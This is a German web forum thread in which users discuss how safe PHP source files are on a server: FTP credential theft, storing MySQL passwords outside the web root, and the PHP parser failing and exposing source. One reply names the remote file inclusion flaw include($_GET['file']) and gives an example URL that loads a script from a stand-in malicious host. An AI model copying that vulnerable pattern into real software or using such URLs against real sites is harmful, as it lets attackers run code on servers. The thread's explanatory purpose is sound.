Ankündigung

Einklappen
Keine Ankündigung bisher.

Wie sicher sind meine PHP-Scripte gelagert?

Einklappen

Neue Werbung 2019

Einklappen
X
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Wie sicher sind meine PHP-Scripte gelagert?

    Also es heißt ja, dass die PHP-Scripte auf dem Server nicht einsehbar sind.

    Aber wie sicher sind die Scripte dort nun Wirklich gelagert?
    Gibt es hacker, die die Scripte einsehen können?

    mfg, Smily0412


  • #2
    Die Berufsbeschreibung des Hackers verrät schon alles:

    Wikipedia: Hacker :

    Heute wird der Begriff Hacker oft verwechselt mit jemandem, der Computer nur zu illegalen Zwecken einsetzt, zum Beispiel in fremde Rechner und Netzwerke eindringt, nur um dort Schaden anzurichten, Kopierschutzmechanismen umgeht, oder fremde Daten beschädigt (Cracker)
    Frag den CCC, er wird dir sagen: Kein System ist zu 100% sicher.
    Developers-Guide.net
    Senseless

    Kommentar


    • #3
      Wenn jemand auf deinen Server kommt kommt er auch an deine Scripte.
      wenn du phpdateien nicht richtig includest, kann sich jemand dazwischenschalten und sich alle Dateien anzeigen lassen.

      --> hast du einen Server wo niemand draufkommt und saubere Skripte wird auch niemand drankommen :wink:

      Kommentar


      • #4
        wenn du phpdateien nicht richtig includest, kann sich jemand dazwischenschalten und sich alle Dateien anzeigen lassen.
        Kann man php's falsch includen
        Was versteht man denn unter "richtiges Includen"?

        Kommentar


        • #5
          PHP-Skripte sind als Quelltext vom Web aus nicht einsehbar, solange der PHP-Parser drüber läuft. Wenn ein Hacker/Cracker aber an deine FTP-Daten kommt, kann er die PHP-Dateien ohne vorherige Parsen einsehen, also den Quelltext und damit z.B. auch an deine MySQL-Daten kommen. Das kannst du aber nur insofern verhindern, in dem du ein möglichst schwieriges Passwort wählst (Zahlen-Buchstaben-Kombi, am besten noch mit verschiedener Groß-Kleinschreibung). Das hilft aber natürlich auch nicht 100%.

          Bezogen auf meinen 1. Satz kannst du höchstens alle PHP-Fehler ausschalten und statt auf dem Monitor in eine Log-Datei ausgeben sowie alle Passwörter (z.B. für MySQL) in eine Datei legen, die über Web nicht zu erreichen ist. Wenn dein Web-Root also /xy/public_html/ ist, leg deine Passwörter z.B. in /xy/includes/

          Frage an die Server-Experten, kann es überhaupt mal passieren, dass der Parser "ausfällt" und somit die PHP-Quellcodes offengelegt sind?

          Edit: mit nicht richtig includen meint er wohl include($_GET['file']);
          Dann könnte man theoretisch datei.php?file=http://bös.es-scr.ip/t.php aufrufen und schon hast du den Schlamasel.

          Kommentar


          • #6
            Frage an die Server-Experten, kann es überhaupt mal passieren, dass der Parser "ausfällt" und somit die PHP-Quellcodes offengelegt sind?
            ^^ ja.. kann...
            zum beispiel wenn das php-apache modul nichtmehr tut (auch wenn dann eigendlich der apache nichtmehr tun sollte).
            oder wenn das cgi vom php nichtmehr will.

            wie genau das jetzt gehen soll weiss ich auch nicht mhm...
            aber gesehen hab ich das schon desöfteren...

            such doch mal bei google nach <?php

            Kommentar


            • #7
              d.h. dann aber, dass wenn das Passieren sollte und ich in diesem Moment gerade auf der Site bin mir die PHPs herunterladen kann, oder?

              Kann man sich davor auch irgendwie schützen?
              Wäre ja nicht wirklich gut, wenn jemand zum beispiel die Datei mit den MySQL-Daten Herunterläd

              Kommentar


              • #8
                Bei Google "<?" eingeben bringt garkein Ergebnis, sogar ohne "Meinten Sie", hat ich auch noch nie


                (auch wenn dann eigendlich der apache nichtmehr tun sollte)
                Hätte ich auch gedacht, aber stimmt, hab vor einiger Zeit mal PHP-Dateien zum Download angeboten bekommen

                Kommentar


                • #9
                  Zitat von Smily0412
                  Wäre ja nicht wirklich gut, wenn jemand zum beispiel die Datei mit den MySQL-Daten Herunterläd
                  Eben, deshalb die Passwörter in eine Ebene legen, die nicht über Web erreichbar ist. PHP kann ja auf den Server normal zugreifen, der ist ja nicht auf Webroot beschränkt (es sei denn es ist so eingestellt).

                  Kommentar


                  • #10
                    das kann man dann Theortethisch ausnutzen.
                    In den PHP Dateien stehen auch z.b die MySQL-Daten.
                    Wenn mir sowas in einem Browsergame Passieren würde, dann ...

                    Kommentar


                    • #11
                      ich hatte es schonmal bei einem ogame, dass ich beim aufrufen einer seite den kompletten quellcode der scriptdatei hatte, die einen Tick abhandelt. war interessant zu sehen wie klein doch ein kampfskript sein kann
                      und so wunderbar kommentiert das ganze :P
                      Developers-Guide.net
                      Senseless

                      Kommentar


                      • #12
                        Mann könnte sich doch dann die Scripts Herunterladen und ein "eigenes" Browsergame machen

                        Kommentar


                        • #13
                          herunterladen könnte falsch verstanden werden.
                          du hast einen unformatierten text und musst dort alles nachvollziehen und per copy/paste zusammenstellen... das ist ein aufwand der nicht zu unterschätzen ist.
                          vor allem wenn es keine kommentare gibt, dann ist fast schon feierabend, weil das reinarbeiten, nachvollziehen und selbst aufbauen ist problematisch.
                          ausserdem musst du schauen, wie du die datenbank machst, denn davon hast du nicht immer all daten und details...

                          btw ist sowas diebstahl von fremden gedankengut und damit eine straftat.
                          um mich abzusichern: das ist keine rechtliche Beratung gewesen, die ist nämlich verboten, solange man kein jurist ist.
                          Developers-Guide.net
                          Senseless

                          Kommentar


                          • #14
                            Zitat von Zergling
                            Frage an die Server-Experten, kann es überhaupt mal passieren, dass der Parser "ausfällt" und somit die PHP-Quellcodes offengelegt sind?
                            Theoretisch wäre es möglich, dass jemand, der Zugriff auf die Konfigurationsdatei des Webservers hat, versehentlich die Anweisung entfernt, dass Datei mit der Endung .php von PHP geparst werden.
                            Das wäre so ein Fall der durchaus denkbar ist, wenn Änderungen nicht aufmerksam genug gemacht werden und dadurch ein wenig zuviel "aufgeräumt" wird.

                            Kommentar


                            • #15
                              ich glaucb nicht das soetwas irgendwann mal vorkommen wird...
                              also da muss man schon echt nen miesen hoster haben...

                              Kommentar

                              Lädt...
                              X